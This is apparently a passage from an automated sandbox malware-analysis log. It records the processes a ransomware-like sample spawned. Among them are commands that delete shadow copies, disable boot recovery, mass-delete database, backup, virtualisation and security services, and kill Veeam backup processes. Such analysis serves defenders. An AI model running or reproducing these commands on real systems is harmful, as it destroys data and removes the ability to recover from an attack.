        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop SQLSERVERAGENTJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQLSERVER start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "SQL Server (MSSQLSERVER)" start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop MSSQL$
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQL$ start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Tomcat7w.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM DDSoftPwsTomcat9.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM U8SmartClient.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop MSSQL$
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "XT800Service_Personal"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: atl.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeSection loaded: opcservices.dllJump to behavior
